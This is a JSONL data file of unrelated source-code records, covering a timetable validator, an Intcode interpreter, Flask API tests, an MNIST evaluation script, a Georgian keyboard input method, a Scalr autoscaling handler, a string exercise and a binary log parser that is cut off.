+{"seq_id":"636715898","text":"# -*- encoding: utf-8 -*-\n# Copyright 2016 Vinzor Co.,Ltd.\n#\n# comment\n#\n# 2016/3/19 lipeizhao : Init\n# 2016/6/21 fengyingcai: Sort the timetable to fix the mismatch between sequence numbers and period order\n\nimport datetime\nimport subprocess\nimport os\nimport rsa\nfrom random import randint, choice\nimport string\nimport logging\nimport hashlib\nfrom binascii import hexlify,unhexlify\n\nfrom voluptuous import Schema, Required, All, Length, Range, Invalid\nfrom sqlalchemy import and_, cast, \\\n    Integer\nimport requests\nimport shutil\n\nLOG = logging.getLogger(__name__)\n\ndef is_timetable_legal(timetable):\n    \"\"\"Check whether a timetable is valid\n    \" Validity condition: every period's start and end time must be non-empty, and all time points must be strictly increasing\n    :rtype: object\n    \"\"\"\n    last_time = \"00:00\"\n    last_time = int(last_time.replace(\":\",\"\"))\n    values = [x for x in timetable.values()]\n    values = sorted(values, key=lambda x: int(x['start_time'].replace(':', '')))\n\n    for value in values:\n        start_time = int(value[\"start_time\"].replace(\":\",\"\"))\n        end_time = int(value[\"end_time\"].replace(\":\",\"\"))\n        if start_time and end_time and start_time >= last_time and end_time > start_time:\n            last_time = end_time\n        else:\n            return False\n    return True\n\ndef check_time_conflict(start_time, end_time, periods):\n    periods = sorted(periods, key=lambda x: x.start_time)\n    for period in periods:\n        if not (end_time <= period.start_time or start_time >= period.end_time):\n            return False\n    return True\n\nclass ParametersValidator():\n\n    # define parameter validators here\n    def __init__(self):\n        self.schema = Schema({\n            'param_1': All(str, Length(min=5)),\n            'param_2': All(self.Int()),\n            'param_3': All(self.Date())\n        })\n\n    def validate(self, parameters):\n        fail_dict = {}\n        for key in parameters:\n            try:\n                
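# validate one key at a time so every failing parameter is collected in fail_dict\n                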
self.schema({key: parameters[key]})\n except Invalid as e:\n fail_dict[key] = {'value': parameters[key],\n 'msg': e.msg}\n LOG.exception(e.msg)\n return fail_dict\n\n # helper methods\n def Date(self, fmt='%Y/%m/%d'):\n return lambda v: datetime.datetime.strptime(v, fmt)\n\n def Int(self):\n def is_int(v):\n try:\n int(v)\n except Exception as e:\n raise Invalid('not int')\n return is_int\n\n\nParamsValidator = ParametersValidator()\n\n\ndef judge_file(file, size):\n '''\n To judge whether the file is valid.\n @param file: the file object\n @param size: the size(MB) of the limit of the file.\n '''\n try:\n if file and size:\n if file.content_length > (size * 1024 * 1024):\n return False, \"too large\"\n temp = file.filename.split(\".\")\n file_type = temp[len(temp) - 1]\n if file_type == \"xls\" or file_type == \"xlsx\":\n return True, \"\"\n else:\n return False,\"type error\"\n else:\n raise \"Invalid parameter\"\n except Exception as ex:\n LOG.exception(\"Check File Failed: %s\", ex)\n return False, \"\"\n\n\nif __name__ == '__main__':\n pass","sub_path":"src/web/app/setting/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"512553310","text":"#!/usr/bin/env python3\n\ndef read_input():\n with open(\"input.txt\") as inp:\n prog = inp.readline()\n return prog.split(',')\n\ndef init(prog):\n prog[1] = 12\n prog[2] = 2\n return prog\n\ndef get_value(pos,mode):\n if mode == '0':\n val = prog[prog[pos]]\n else:\n val = prog[pos]\n return val\n\n\ndef add_store(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n prog[prog[pos+3]]=val1+val2\n\ndef mul_store(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n prog[prog[pos+3]]=val1*val2\n\ndef input_op(prog,pos):\n read = input(\"Input:\")\n prog[prog[pos+1]] = int(read)\n\ndef output(prog,pos,mode):\n print(\"Output:\",get_value(pos+1,mode))\n\ndef jump_if_true(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 != 0:\n newpos = val2\n else:\n newpos = pos+3\n return newpos\n\ndef jump_if_false(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 == 0:\n newpos = val2\n else:\n newpos = pos+3\n return newpos\n\ndef less_than(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 < val2:\n prog[prog[pos+3]] = 1\n else:\n prog[prog[pos+3]] = 0\n\ndef equals(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 == val2:\n prog[prog[pos+3]] = 1\n else:\n prog[prog[pos+3]] = 0\n\ndef run_prog(prog):\n pos = 0\n print(str(prog[pos]).zfill(5))\n while prog[pos] != 99:\n op = str(prog[pos]).zfill(5)\n try:\n if op[-2:] == '01':\n add_store(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '02':\n mul_store(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '03':\n input_op(prog,pos)\n pos+=2\n elif op[-2:] == '04':\n output(prog,pos,op[2])\n pos+=2\n elif op[-2:] == '05':\n pos = jump_if_true(prog,pos,op[2],op[1])\n elif op[-2:] == '06':\n pos = jump_if_false(prog,pos,op[2],op[1])\n elif op[-2:] == '07':\n less_than(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '08':\n equals(prog,pos,op[2],op[1])\n pos+=4\n except Exception as e: \n print(e)\n print('Exception!!!!')\n return -1\n return prog[0]\n\ndef find_inputs(prog):\n test_prog = prog.copy()\n for i in range(0,100):\n for j in 
range(0,100):\n test_prog[1]=i\n test_prog[2]=j\n result = run_prog(test_prog)\n if result == 19690720:\n return i*100+j\n test_prog = prog.copy()\n\nif __name__ == \"__main__\":\n prog = read_input()\n prog = list(map(lambda x: int(x), prog))\n run_prog(prog)\n","sub_path":"day5/code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262490666","text":"import pytest\nfrom flask import g\nfrom flask import session\nfrom flask import *\nimport json\n\nfrom project.db import get_db\n\n\n# Test /message/send\ndef test_message_send(client, app):\n # Add existing message for error testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent,flag) VALUES (?, ?, ?, ?);',\n (\"mary\", \"jane\", \"hello\", 0))\n get_db().commit()\n\n url = \"/message/send\"\n\n # test a valid POST request\n valid_data = {\"userfrom\": \"mary\",\n \"userto\": \"jane\", \"messagecontent\": \"hello\", \"flag\": 0}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the user was inserted into the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * FROM messages WHERE userfrom = 'mary'\").fetchone()\n is not None\n )\n\n\n@pytest.mark.parametrize(\n (\"userfrom\", \"userto\", \"messagecontent\",\n \"flag\", \"message\", \"http_status_code\"),\n (\n (\"\", \"ross\", \"hello\", 0, b\"No user from\", 404),\n (\"bob\", \"\", \"hello\", 0, b\"No user to\", 404),\n (\"bob\", \"ross\", \"\", 0, b\"No message\", 404),\n\n ),\n)\ndef test_message_send_validate(client, userfrom, userto, messagecontent, flag, message, http_status_code):\n url = \"/message/send\"\n bad_data = {\"userfrom\": userfrom, \"userto\": userto,\n \"messagecontent\": messagecontent, \"flag\": flag}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n\n\n# Test message/delete\ndef test_message_delete(client, app):\n # Add user for delete testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent, flag) VALUES (?, ?, ?, ?);',\n (\"delete\", \"message\", \"please\", 0))\n get_db().commit()\n\n url = \"/message/delete\"\n\n # test a valid POST request\n valid_data = {\"userfrom\": \"delete\",\n \"messagecontent\": \"please\"}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the new email was inserted into the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * FROM messages where userfrom = 'delete' \").fetchone()\n is None\n )\n\n\n@pytest.mark.parametrize(\n (\"userfrom\", \"messagecontent\", \"message\", \"http_status_code\"),\n (\n (\"\", \"hello\", b\"user doesn't exist\", 404),\n (\"bob\", \"\", b\"no message provided\", 404),\n ),\n)\ndef test_message_delete_validate(client, userfrom, messagecontent, message, http_status_code):\n url = \"/message/delete\"\n bad_data = {\"userfrom\": userfrom, \"messagecontent\": messagecontent}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n\n\n# Test message/flag\ndef test_message_flag(client, app):\n # Add user for delete testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent, flag) VALUES (?, ?, ?, ?);',\n (\"flag\", \"this\", \"messagetest\", 1))\n get_db().commit()\n\n url = 
\"/message/flag\"\n\n # test a valid POST request\n valid_data = {\"messagecontent\": \"messagetest\",\"flag\": 1}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the user was deleted from the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * from messages where messagecontent = 'messagetest'\").fetchone()\n is not None\n )\n\n\n@pytest.mark.parametrize(\n (\"messagecontent\",\"flag\", \"message\", \"http_status_code\"),\n (\n (\"\",1, b\"message can't be found\", 404),\n \n ),\n)\ndef test_message_flag_validate(client, messagecontent,flag, message, http_status_code):\n url = \"/message/flag\"\n bad_data = {\"messagecontent\": messagecontent,\"flag\":flag}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"395622977","text":"# -*-encoding:utf8-*-\n\nfrom classifier.ListClassifier import ListClassifier\n\n\nimport os\nimport argparse\nimport pandas as pd\nimport pickle\n\nfrom sklearn import metrics\n\n\nDIR_SERIALIZED_CLASSIFIERS = os.path.dirname(__file__) + \"/serializedClassifiers/\"\n\nPROG = \"Lance le test pour les classifiers implémentés\"\nparser = argparse.ArgumentParser(prog='PROG')\n\nparser.add_argument('--rf', action=\"store_true\", dest=\"rf\",\n help=\"Lance l'apprentissage du Random forest\")\nparser.add_argument('--svm', action=\"store_true\", dest=\"svm\",\n help=\"Lance l'apprentissage du SVM\")\nparser.add_argument('--nn', action=\"store_true\", dest=\"nn\",\n help=\"Lance l'apprentissage du Perceptron Multicouche\")\n\nargs = parser.parse_args()\n\nrf = args.rf\nsvm = args.svm\nnn = args.nn\n\ntest_file = os.path.dirname(__file__) + \"/mnistData/mnist_test.csv\"\n\ndataset = pd.read_csv(test_file)\n\n# numpy array of values of targets\ntarget = dataset[[0]].values.ravel()\ndata = dataset.iloc[:, 1:].values\n# Normalisation des données\ndata_predict = data / 255.\n\n# liste des classifiers\nl_cls = []\n# noms des classifiers\nnames_cls = []\n\n# déserialisation des modèles\nif rf:\n print(\"INFO: Prise en compte du Random Forest\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"RandomForestWrap.pkl\", 'rb') as f:\n rfw = pickle.load(f)\n l_cls.append(rfw)\n names_cls.append(\"Random Forest\")\nif svm:\n print(\"INFO: Prise en compte du SVM\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"SVMWrap.pkl\", 'rb') as f:\n svmw = pickle.load(f)\n l_cls.append(svmw)\n names_cls.append(\"SVM\")\n\nif nn:\n print(\"INFO: Prise en compte du Perceptron Multicouche\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"NeuralNetworkWrap.pkl\", 'rb') as f:\n nnw = pickle.load(f)\n l_cls.append(nnw)\n names_cls.append(\"Perceptron Multicouche\")\n\n\nprint(\"INFO: Prédiction :\")\n# Affichage les mesures\nprint(\"\\nINFO: Classification Report :\")\nfor i, cls in enumerate(l_cls):\n labels = cls.predict(data_predict[:100])\n print(\"\\nClassification report for classifier %s:\\n%s\\n\"\n % (names_cls[i],\n metrics.classification_report(target[:100], labels)))\n\n\n\n\n\n\n","sub_path":"mnist_test_models.py","file_name":"mnist_test_models.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19743292","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2009 Lado 
Kumsiashvili \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n\nfrom geoinputbase import geoinputbase\nimport appuifw\nfrom utils import u\nfrom key_codes import EKey0, EKey1, EKey2, EKey3, EKey4, EKey5, EKey6, EKey7, EKey8, EKey9, EKeyHash, EModifierCtrl, EKeyBackspace, EScancodeBackspace, EScancodeHash\nfrom keycapture import KeyCapturer\nfrom keypress import simulate_key\n\n\nclass geoinput(geoinputbase):\n    def __init__(self):\n        geoinputbase.__init__(self)\n\n    def init(self):\n        geoinputbase.init(self)\n        #self.log(\"geoinput\")\n        self.mainCapturer = None # main capturer\n        self.switcherCapturer = None\n        self.switcherFirstClickCapturer = None\n\n        self.switcherFirsKeyLastClickAt = 0\n        self.mod = 0\n        self.keymap = {\n            EKey0 : [\" \", \"0\", \"\\r\"],\n\n            EKey1 : [\".\", \",\", \"?\", \"!\", \"@\", \"'\", \"-\", \"1\"],\n            EKey2 : [\"ა\", \"ბ\", \"ც\", \"ჩ\", \"2\"],\n            EKey3 : [\"დ\", \"ე\", \"ფ\", \"3\"],\n            EKey4 : [\"გ\", \"ჰ\", \"ი\", \"4\"],\n            EKey5 : [\"ჯ\", \"კ\", \"ლ\", \"ჟ\", \"5\"],\n            EKey6 : [\"მ\", \"ნ\", \"ო\", \"6\"],\n            EKey7 : [\"პ\",\"ქ\",\"რ\",\"ს\",\"ღ\",\"შ\",\"7\"],\n            EKey8 : [\"ტ\",\"უ\",\"ვ\",\"თ\",\"8\"],\n            EKey9 : [\"წ\",\"ხ\",\"ყ\",\"ზ\",\"ჭ\",\"ძ\",\"9\"]\n        }\n        for value in self.keymap.values():\n            for i in range(len(value)):\n                value[i]=ord(u(value[i]))\n\n    def initMainCapturer(self):\n        self.mainCapturer = KeyCapturer(self.mainCallBack)\n        self.mainCapturer.keys = tuple(self.keymap.keys())\n        self.mainCapturer.start()\n        self.initSwitcherCapturers()\n\n\n    def mainCallBack(self, key):\n        if self.isExceptionInFg():\n            self.mainCapturer.stop()\n            simulate_key(key, key)\n            self.mainCapturer.start()\n            return\n        if key == EKey0:\n            if self.switcherCallBack(key):\n                return\n        self.checkTime()\n        if self.lastKey == key :\n            self.backspaceCapturer.stop() # we must stop backspace, because the next call is a \"dummy backSpace\" to remove a digit in-place\n            sim_key = self.getSimKey(key) #self.keymap[key][mod]\n            if sim_key == key : # got number, we need special handling\n                self.mainCapturer.stop() # commonCapturer must not capture the next fired keycode.\n                simulate_key(EKeyBackspace, EScancodeBackspace)\n                simulate_key(key, 0, EModifierCtrl) # send number code\n                self.mainCapturer.start()\n            else : # usual handling\n                simulate_key(EKeyBackspace, EScancodeBackspace)\n                simulate_key(sim_key, sim_key)\n            self.backspaceCapturer.start() # enable backspace forwarding\n        else:\n            sim_key = self.keymap[key][0]\n            simulate_key(sim_key, sim_key)\n        self.lastKey = key\n        self.mod = 1\n\n    ## #\n    def getSimKey(self, key):\n        key_tuple = self.keymap[key]\n        sim_key = key_tuple[self.mod]\n        self.mod = (self.mod + 1) % len(key_tuple)\n        return sim_key\n\n\n    def getSwitchetFirstKey(self):\n        return [EKeyHash]\n\n    def getSwitcherSecondKey(self):\n        return [EKey0]\n\n\n    def stopMainCapturer(self):\n        self.mainCapturer.stop()\n\n    def startMainCapturer(self):\n        
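# restart the main key capturer (counterpart of stopMainCapturer above)\n        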
self.mainCapturer.start()\n\n def shutdown(self):\n geoinputbase.shutdown(self)\n del self.mainCapturer\n\n\n def start(self):\n geoinputbase.start(self)\n if self.switcherSecondKeyInMainCapturer():\n self.switcherCapturer.stop()\n else:\n self.switcherCapturer.start()\n self.currentLang = u'ka'\n\n def switcherSecondKeyInMainCapturer(self) :\n return True\n\n # # #\n def initSwitcherCapturers(self):\n self.switcherCapturer = KeyCapturer(self.switcherCallBack)\n self.switcherCapturer.keys = tuple(self.getSwitcherSecondKey())\n self.switcherCapturer.forwarding = 1\n if not self.switcherSecondKeyInMainCapturer() :\n self.switcherCapturer.start()\n self.switcherFirstClickCapturer = KeyCapturer(self.switcherFirstClickCallBack)\n self.switcherFirstClickCapturer.keys = tuple(self.getSwitchetFirstKey())\n self.switcherFirstClickCapturer.forwarding = 1\n self.switcherFirstClickCapturer.start()\n\n\n def needToggle(self):\n now = self.now()\n timeDiff = now - self.switcherFirsKeyLastClickAt\n if timeDiff < 0.33:\n self.switcherFirsKeyLastClickAt = 0\n self.switcherCapturer.forwarding = 0\n return True\n return False\n\n\n # # #\n def switcherCallBack(self, key):\n if key in self.getSwitcherSecondKey():\n if self.isExceptionInFg():\n return False\n if not self.needToggle():\n return False\n retval = self.toggle()\n simulate_key(EKeyHash, EScancodeHash)\n return retval\n\n # # #\n def switcherFirstClickCallBack(self, key):\n if key in self.getSwitchetFirstKey():\n self.switcherFirsKeyLastClickAt = self.now()\n\n def stop(self):\n geoinputbase.stop(self)\n self.switcherCapturer.forwarding = 1\n if self.switcherSecondKeyInMainCapturer():\n self.switcherCapturer.start()\n","sub_path":"geoinput.py","file_name":"geoinput.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300961350","text":"# coding:utf-8\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nVARIABLE_SPILLOVER_ALIAS = \"SPILLOVER_ALIAS\"\nVARIABLE_SPILLOVER_UPSCALE_MININSTANCES = \"SPILLOVER_UP_MININSTANCES\"\nVARIABLE_SPILLOVER_DOWNSCALE_MININSTANCES = \"SPILLOVER_DOWN_MININSTANCES\"\n\nSPILLOVER_STATUSES = (\"Pending\", \"Initializing\", \"Running\")\n\n\ndef extract_item_list(obj_dict, key):\n # Helper method to extract a list of 'Item' at a key\n # We have to handle the edge case where there are no items at all, and\n # the edge case where is only one item (which is therefore returned as a list)\n obj_set = obj_dict.get(key)\n if obj_set is None:\n obj_set = {\"Item\": []}\n objs = obj_set[\"Item\"]\n return [objs] if isinstance(objs, dict) else objs\n\n\nclass FarmRoleNotFound(Exception):\n pass\n\n\nclass ScalingStatus(object):\n def __init__(self, farm_role_dict):\n self.min_instances = int(farm_role_dict[\"ScalingProperties\"][\"MinInstances\"])\n self.max_instances = int(farm_role_dict[\"ScalingProperties\"][\"MaxInstances\"])\n\n servers = extract_item_list(farm_role_dict, \"ServerSet\")\n spillover_server_set = [server_dict for server_dict in servers\n if server_dict[\"Status\"] in SPILLOVER_STATUSES]\n\n self.spillover_server_count = len(spillover_server_set)\n\n def is_at_max(self):\n return self.spillover_server_count >= self.max_instances\n\n def is_at_min(self):\n return self.spillover_server_count <= self.min_instances\n\n\nclass FarmRole(object):\n def __init__(self, farm_role_dict):\n self.farm_role_dict = farm_role_dict\n self.scaling_status = ScalingStatus(farm_role_dict)\n\n @property\n def id(self):\n return 
self.farm_role_dict[\"ID\"]\n\n @property\n def alias(self):\n return self.farm_role_dict[\"Alias\"]\n\n @classmethod\n def _from_farm_dict_with_prop(cls, farm_dict, searched_prop, searched_value):\n # Only one Farm Role this fails!\n for farm_role_dict in extract_item_list(farm_dict, \"FarmRoleSet\"):\n value = farm_role_dict[searched_prop]\n if value != searched_value:\n continue\n return FarmRole(farm_role_dict)\n raise FarmRoleNotFound(\"Unable to find Farm Role with {0}: '{1}'\".format(searched_prop, searched_value))\n\n @classmethod\n def from_farm_dict_with_alias(cls, farm_dict, searched_alias):\n return cls._from_farm_dict_with_prop(farm_dict, \"Alias\", searched_alias)\n\n @classmethod\n def from_farm_dict_with_id(cls, farm_dict, searched_id):\n return cls._from_farm_dict_with_prop(farm_dict, \"ID\", searched_id)\n\n\nclass EventHandler(object):\n def __init__(self, payload, api_client):\n self.payload = payload\n self.api_client = api_client\n self.logger = logging.getLogger(\":\".join((__name__, self.payload[\"eventId\"])))\n\n self.handlers = {\n \"BeforeInstanceLaunch\": self.handle_scale_up,\n \"HostInit\": self.handle_scale_up,\n \"HostUp\": self.handle_scale_up,\n \"HostDown\": self.handle_scale_down,\n \"BeforeHostTerminate\": self.handle_scale_down,\n \"InstanceLaunchFailed\": self.handle_error,\n }\n\n def handle(self):\n event_name = self.payload[\"eventName\"]\n handler = self.handlers.get(event_name)\n if handler is None:\n self.logger.info(\"No handler for event: '%s'\", event_name)\n return\n handler()\n\n def _api_set_min_instances(self, farm_role, min_instances):\n self.logger.info(\"Setting MinInstances on '%s' to %s\", farm_role.alias, min_instances)\n\n self.api_client.call(\"FarmUpdateRole\", {\n \"FarmRoleID\": farm_role.id,\n \"Configuration[scaling.enabled]\": \"1\",\n \"Configuration[scaling.min_instances]\": min_instances\n })\n\n def _api_increase_min_instances(self, farm_role, min_instances):\n if farm_role.scaling_status.min_instances >= min_instances:\n self.logger.debug(\"On '%s', not increasing MinInstances to %s, MinInstances is already at %s\",\n farm_role.alias, min_instances, farm_role.scaling_status.min_instances)\n return\n self._api_set_min_instances(farm_role, min_instances)\n\n\n def _api_decrease_min_instances(self, farm_role, min_instances):\n if farm_role.scaling_status.min_instances <= min_instances:\n self.logger.debug(\"On '%s', not decreasing MinInstances to %s, MinInstances is already at %s\",\n farm_role.alias, min_instances, farm_role.scaling_status.min_instances)\n return\n self._api_set_min_instances(farm_role, min_instances)\n\n def _handle_spillover_event(self, callback):\n triggering_farm_role_id = self.payload[\"data\"][\"SCALR_FARM_ROLE_ID\"]\n spillover_alias = self.payload[\"data\"].get(VARIABLE_SPILLOVER_ALIAS)\n\n if spillover_alias is None:\n self.logger.debug(\"No spillover alias\")\n return\n self.logger.info(\"Spillover alias is '%s'\", spillover_alias)\n\n # We have a spillover alias, call the API to figure whether we need to spillover\n farm_id = self.payload[\"data\"][\"SCALR_FARM_ID\"]\n self.logger.info(\"Farm ID is '%s'\", farm_id)\n\n farm_dict = self.api_client.call(\"FarmGetDetails\", {\"FarmID\": farm_id})\n\n #Note: We could merge these two loops for performance, but let's keep it simple here!\n\n self.logger.debug(\"Searching for spillover Farm Role '%s'\", spillover_alias)\n spillover_role = FarmRole.from_farm_dict_with_alias(farm_dict, spillover_alias)\n self.logger.info(\"Spillover Role found '%s' 
(%s)\", spillover_role.alias, spillover_role.id)\n\n        self.logger.debug(\"Searching for Triggering Farm Role '%s'\", triggering_farm_role_id)\n        triggering_role = FarmRole.from_farm_dict_with_id(farm_dict, triggering_farm_role_id)\n        self.logger.info(\"Triggering Role found '%s' (%s)\", triggering_role.alias, triggering_role.id)\n\n        self.logger.info(\"Scaling status: %s/%s\", triggering_role.scaling_status.spillover_server_count,\n                         triggering_role.scaling_status.max_instances)\n\n        callback(triggering_role, spillover_role)\n\n    ## BeforeInstanceLaunch ##\n\n    def _handle_scale_up_callback(self, triggering_role, spillover_role):\n        spillover_up_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_UPSCALE_MININSTANCES, 1))\n\n        if not triggering_role.scaling_status.is_at_max():\n            self.logger.debug(\"No spillover needed for: '%s'\", triggering_role.alias)\n            return\n        self.logger.info(\"Spillover needed for: '%s'\", triggering_role.alias)\n\n        self._api_increase_min_instances(spillover_role, spillover_up_min)\n\n    def handle_scale_up(self):\n        self._handle_spillover_event(self._handle_scale_up_callback)\n\n    ## InstanceLaunchFailed ##\n\n    def _handle_error_callback(self, triggering_role, spillover_role):\n        spillover_up_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_UPSCALE_MININSTANCES, 1))\n\n        self.logger.info(\"Launch failed on: '%s'\", triggering_role.alias)\n\n        self._api_increase_min_instances(spillover_role, spillover_up_min)\n\n    def handle_error(self):\n        self._handle_spillover_event(self._handle_error_callback)\n\n\n    ## Host down ##\n\n    def _handle_scale_down_callback(self, triggering_role, spillover_role):\n        spillover_down_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_DOWNSCALE_MININSTANCES, 0))\n\n        if not triggering_role.scaling_status.is_at_min():\n            self.logger.debug(\"No end spillover needed for: '%s'\", triggering_role.alias)\n            return\n\n        self.logger.info(\"End spillover needed for: '%s'\", triggering_role.alias)\n\n        self._api_decrease_min_instances(spillover_role, spillover_down_min)\n\n    def handle_scale_down(self):\n        self._handle_spillover_event(self._handle_scale_down_callback)\n\n","sub_path":"core/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"125552524","text":"\"\"\"\nImplement a function int_func() that takes a word of lowercase Latin letters and returns the same word,\nbut with the first letter capitalized. For example, print(int_func('text')) -> Text.\nContinuing the task: the program receives a string of words separated by spaces.\nEach word consists of lowercase Latin letters. Print the original string,\nbut with every word starting with a capital letter. The previously written int_func() must be used.\n\"\"\"\n\n\n# Implemented without the built-in str.title() method.\ndef title_func(text: str) -> str:\n    return text.replace(text[0], chr(ord(text[0]) - 32), 1)\n\n\n# Generate some random text. I know imports have not been covered yet, but typing a text by hand every time is inconvenient.\ndef random_text(length: int) -> str:\n    import random\n    text = \"\"\n    for i in range(length):\n        text += chr(random.randint(ord('a'), ord('z')))\n    return text.replace(text[random.randint(0, len(text))], \" \")\n\n\n# Now solve the task itself. 
It would be simpler to do this with map, but we use the good old for loop.\nif __name__ == \"__main__\":\n    words_set = random_text(int(input(f'Enter the number of characters for the text!\\n')))\n    print(f'Resulting text:\\n{\"+\" * 50}\\n{words_set}\\n{\"+\" * 50}')\n    words_set = words_set.split()\n    for item in range(len(words_set)):\n        words_set[item] = title_func(words_set[item])\n    words_set = \" \".join(words_set)\n    print(f'Modified text:\\n{words_set}\\n{\"+\" * 50}')\n","sub_path":"Lesson3/base_les3_6.py","file_name":"base_les3_6.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"604161835","text":"import re\nfrom functools import reduce\nimport matplotlib.pyplot as plt\nimport binascii\nimport struct\nimport array\nimport os\n\nfrom src import MainDialog\n\n\ndef main(fileName):\n\n\n    # print(os.path.abspath(os.path.join(os.path.dirname(__file__), '..\\..\\Data.rec')))\n    f = open(fileName, 'rb')\n\n    # Read the signature\n    signature = f.read(4)\n    print('Signature hex', signature, signature[::-1])\n    print('signature dec', reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(signature)))))\n\n    # Seek to byte 5 to read the number of signals\n    f.seek(4)\n\n    # Read the number of signals\n    quantity_of_signals = f.read(2)\n    int_quantity_of_signals = reduce(lambda s, x: s * 256 + x, bytearray(quantity_of_signals[::-1]))\n\n    print('Number of signals', int_quantity_of_signals)\n\n    # Seek to byte 7 to read the number of one-shot commands\n    f.seek(6)\n\n    quantity_of_raz_command = f.read(2)\n    int_quantity_of_raz_command = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(quantity_of_raz_command))))\n    print('Number of one-shot commands', int_quantity_of_raz_command)\n\n    # Seek to byte 9 to read the number of recorded ticks\n    f.seek(8)\n    quantity_of_tacts = f.read(4)\n    int_quantity_of_tacts = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(quantity_of_tacts))))\n    print('Number of recorded ticks', int_quantity_of_tacts)\n\n    # Seek to byte 13 to read the recording frequency\n    f.seek(12)\n    recording_frequency = f.read(2)\n    recording_frequency = reduce(lambda s, x: s * 256 + x, bytearray(recording_frequency[::-1]))\n    print('Recording frequency', recording_frequency)\n    f.seek(14)\n\n    # walk through the bytes, reading each signal's description length and the description itself\n    k = 0 # iteration counter\n    for i in range(int_quantity_of_signals):\n        desclen = f.read(1)\n        intdesclen = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(desclen))))\n        f.seek(14 + k + 1)\n        signal_desc = f.read(intdesclen)\n        signal_desc = signal_desc.decode('ansi')\n        signal_desc = re.split(r' ', signal_desc, maxsplit=1)\n        signal_name = signal_desc[0]\n        signal_desc = signal_desc[1]\n\n        print(intdesclen, signal_name, signal_desc)\n\n        f.seek(14 + k + 1 + intdesclen)\n        k += 1 + intdesclen\n\n    print('-----------------------------------------------------------------')\n\n    # Walk through the bytes, reading each one-shot command's description length and description\n    for n in range(int_quantity_of_raz_command):\n        rkdesclen = f.read(1)\n        intrkdesclen = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(rkdesclen))))\n        f.seek(14 + k + 1)\n        rkdesc = f.read(intrkdesclen)\n        # print(rkdesc.decode('ansi'))\n        print(intrkdesclen, rkdesc.decode('ansi'))\n        f.seek(14 + k + 1 + intrkdesclen)\n        k += 1 + intrkdesclen\n\n    
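# all signal and command descriptions have been consumed; k now marks the start of the per-tick data\n    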
